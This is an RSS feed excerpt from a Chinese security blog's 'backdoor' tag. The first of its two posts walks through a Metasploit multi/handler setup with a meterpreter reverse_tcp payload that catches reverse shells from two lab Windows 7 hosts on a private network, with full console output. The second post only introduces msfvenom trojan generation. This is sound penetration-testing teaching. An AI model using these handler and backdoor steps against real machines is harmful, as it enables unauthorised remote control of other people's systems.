后门 on Rainwo's Blog https://www.rainwo.xyz/tags/%E5%90%8E%E9%97%A8/ Recent content in 后门 on Rainwo's Blog Hugo -- gohugo.io zh-cn © 2026 Rainwo Fri, 30 Oct 2020 00:00:00 +0000 MSF提权操作 https://www.rainwo.xyz/posts/msf%E6%8F%90%E6%9D%83%E6%93%8D%E4%BD%9C/ Fri, 30 Oct 2020 00:00:00 +0000 https://www.rainwo.xyz/posts/msf%E6%8F%90%E6%9D%83%E6%93%8D%E4%BD%9C/ <blockquote><p>最近有个问题苦恼了我很久,“msf”是否可以控制多台服务器,怎么通过“msf”进行提权操作?</p> </blockquote><p>这里我直接开启了两台win7SP1X64的主机,通过运行后门的方式获得shell,这里生成shell的步骤略过。</p> <h2 class="relative group">获得服务器shell <div id="获得服务器shell" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#%e8%8e%b7%e5%be%97%e6%9c%8d%e5%8a%a1%e5%99%a8shell" aria-label="锚点">#</a> </span> </h2> <p>首先我们在kali里面开启msf并调用exploit/multi/handler</p> <div class="highlight-wrapper"><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msf5 &gt; use exploit/multi/handler </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using configured payload generic/shell_reverse_tcp </span></span><span class="line"><span class="cl">msf5 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; <span class="nb">set</span> payload windows/meterpreter/reverse_tcp </span></span><span class="line"><span class="cl"><span class="nv">payload</span> <span class="o">=</span>&gt; windows/meterpreter/reverse_tcp </span></span><span class="line"><span class="cl">msf5 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; <span class="nb">set</span> lhost 192.168.142.19 </span></span><span class="line"><span class="cl"><span class="nv">lhost</span> <span class="o">=</span>&gt; 192.168.142.19 </span></span><span class="line"><span class="cl">msf5 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; <span class="nb">set</span> exitonsession <span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="nv">exitonsession</span> <span class="o">=</span>&gt; <span class="nb">false</span> </span></span><span class="line"><span class="cl">msf5 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; exploit -j </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Exploit running as background job 0. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Exploit completed, but no session was created. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Started reverse TCP handler on 192.168.142.19:4444 </span></span><span class="line"><span class="cl">msf5 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; <span class="o">[</span>*<span class="o">]</span> Sending stage <span class="o">(</span><span class="m">176195</span> bytes<span class="o">)</span> to 192.168.142.24 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Meterpreter session <span class="m">1</span> opened <span class="o">(</span>192.168.142.19:4444 -&gt; 192.168.142.24:52612<span class="o">)</span> at 2020-10-30 10:15:32 +0800 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">msf5 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Sending stage <span class="o">(</span><span class="m">176195</span> bytes<span class="o">)</span> to 192.168.142.101 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Meterpreter session <span class="m">2</span> opened <span class="o">(</span>192.168.142.19:4444 -&gt; 192.168.142.101:49230<span class="o">)</span> at 2020-10-30 10:15:50 +0800 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">msf5 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; sessions </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Active <span class="nv">sessions</span> </span></span><span class="line"><span class="cl"><span class="o">===============</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Id Name Type Information Connection </span></span><span class="line"><span class="cl"> -- ---- ---- ----------- ---------- </span></span><span class="line"><span class="cl"> <span class="m">1</span> meterpreter x86/windows WY-PC<span class="se">\W</span>Y @ WY-PC 192.168.142.19:4444 -&gt; 192.168.142.24:52612 <span class="o">(</span>192.168.200.128<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="m">2</span> meterpreter x86/windows W-Y-PC<span class="se">\W</span>-Y @ W-Y-PC 192.168.142.19:4444 -&gt; 192.168.142.101:49230 <span class="o">(</span>192.168.142.101<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">msf5 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; </span></span></code></pre></div></div> <p>这里要特别注意两个位置:</p> Msfvenom生成后门及运用 https://www.rainwo.xyz/posts/msfvenom%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8%E5%8F%8A%E8%BF%90%E7%94%A8/ Thu, 01 Oct 2020 00:00:00 +0000 https://www.rainwo.xyz/posts/msfvenom%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8%E5%8F%8A%E8%BF%90%E7%94%A8/ <h1 class="relative group">Msfvenom生成后门及运用 <div id="msfvenom生成后门及运用" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#msfvenom%e7%94%9f%e6%88%90%e5%90%8e%e9%97%a8%e5%8f%8a%e8%bf%90%e7%94%a8" aria-label="锚点">#</a> </span> </h1> <blockquote><p>本篇文章将会使用msfvenom来创建木马,然后通过msfconsole中的expoit/multi/handler来反弹靶机shell。</p> </blockquote> <h2 class="relative group">后门的生成: <div id="后门的生成" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#%e5%90%8e%e9%97%a8%e7%9a%84%e7%94%9f%e6%88%90" aria-label="锚点">#</a> </span> </h2> <p>首先通过各种操作系统,脚本语言来生成后门: 常用参数说明:</p>